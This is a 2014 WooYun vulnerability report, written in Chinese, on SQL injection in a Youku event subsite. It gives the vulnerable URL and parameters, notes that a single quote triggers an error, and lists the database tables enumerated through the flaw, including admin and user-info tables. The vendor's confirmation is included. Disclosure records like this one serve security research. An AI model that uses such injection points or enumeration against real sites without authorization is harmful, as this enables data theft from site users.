漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-048160
漏洞标题:优酷某分站SQL注入漏洞
相关厂商:优酷
漏洞作者: 齐迹
提交时间:2014-01-07 14:48
修复时间:2014-02-21 14:49
公开时间:2014-02-21 14:49
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:6
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-01-07: 细节已通知厂商并且等待厂商处理中
2014-01-07: 厂商已经确认,细节仅向厂商公开
2014-01-17: 细节向核心白帽子及相关领域专家公开
2014-01-27: 细节向普通白帽子公开
2014-02-06: 细节向实习白帽子公开
2014-02-21: 细节向公众公开
简要描述:
分站注入
详细说明:
问题发生在
http://event.youku.com/pizzahut/student/index.php?id=76&cid=
加个单引号直接显错。。肯定有问题。
漏洞证明:
Database: test
[122 tables]
+---------------------------------------+
| cruze |
| my_lee |
| tb_access |
| tb_admin |
| tb_bilateral |
| tb_form |
| tb_gift |
| tb_group |
| tb_lottery |
| tb_node |
| tb_poll |
| tb_role |
| tb_role_admin |
| tb_score_history |
| tb_setting |
| tb_share_log |
| tb_user |
| tb_user_info_00 |
| tb_user_info_01 |
| tb_user_info_02 |
| tb_user_info_03 |
| tb_user_info_04 |
| tb_user_info_05 |
| tb_user_info_06 |
| tb_user_info_07 |
| tb_user_info_08 |
| tb_user_info_09 |
| tb_user_info_10 |
| tb_user_info_11 |
| tb_user_info_12 |
| tb_user_info_13 |
| tb_user_info_14 |
| tb_user_info_15 |
| tb_user_info_16 |
| tb_user_info_17 |
| tb_user_info_18 |
| tb_user_info_19 |
| tb_user_info_20 |
| tb_user_info_21 |
| tb_user_info_22 |
| tb_user_info_23 |
| tb_user_info_24 |
| tb_user_info_25 |
| tb_user_info_26 |
| tb_user_info_27 |
| tb_user_info_28 |
| tb_user_info_29 |
| tb_user_info_30 |
| tb_user_info_31 |
| tb_user_info_32 |
| tb_user_info_33 |
| tb_user_info_34 |
| tb_user_info_35 |
| tb_user_info_36 |
| tb_user_info_37 |
| tb_user_info_38 |
| tb_user_info_39 |
| tb_user_info_40 |
| tb_user_info_41 |
| tb_user_info_42 |
| tb_user_info_43 |
| tb_user_info_44 |
| tb_user_info_45 |
| tb_user_info_46 |
| tb_user_info_47 |
| tb_user_info_48 |
| tb_user_info_49 |
| tb_user_info_50 |
| tb_user_info_51 |
| tb_user_info_52 |
| tb_user_info_53 |
| tb_user_info_54 |
| tb_user_info_55 |
| tb_user_info_56 |
| tb_user_info_57 |
| tb_user_info_58 |
| tb_user_info_59 |
| tb_user_info_60 |
| tb_user_info_61 |
| tb_user_info_62 |
| tb_user_info_63 |
| tb_user_info_64 |
| tb_user_info_65 |
| tb_user_info_66 |
| tb_user_info_67 |
| tb_user_info_68 |
| tb_user_info_69 |
| tb_user_info_70 |
| tb_user_info_71 |
| tb_user_info_72 |
| tb_user_info_73 |
| tb_user_info_74 |
| tb_user_info_75 |
| tb_user_info_76 |
| tb_user_info_77 |
| tb_user_info_78 |
| tb_user_info_79 |
| tb_user_info_80 |
| tb_user_info_81 |
| tb_user_info_82 |
| tb_user_info_83 |
| tb_user_info_84 |
| tb_user_info_85 |
| tb_user_info_86 |
| tb_user_info_87 |
| tb_user_info_88 |
| tb_user_info_89 |
| tb_user_info_90 |
| tb_user_info_91 |
| tb_user_info_92 |
| tb_user_info_93 |
| tb_user_info_94 |
| tb_user_info_95 |
| tb_user_info_96 |
| tb_user_info_97 |
| tb_user_info_98 |
| tb_user_info_99 |
| tb_user_info_history |
| tb_visit_log |
| tb_vote |
| tb_vote_log |
| tb_works |
+---------------------------------------+
Database: sh_pizzahut
[3 tables]
+---------------------------------------+
| tb_answer |
| tb_question |
| tb_users |
+---------------------------------------+
修复方案:
过滤
版权声明:转载请注明来源 齐迹@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-01-07 15:05
厂商回复:
多谢提醒,马上修复。
最新状态:
暂无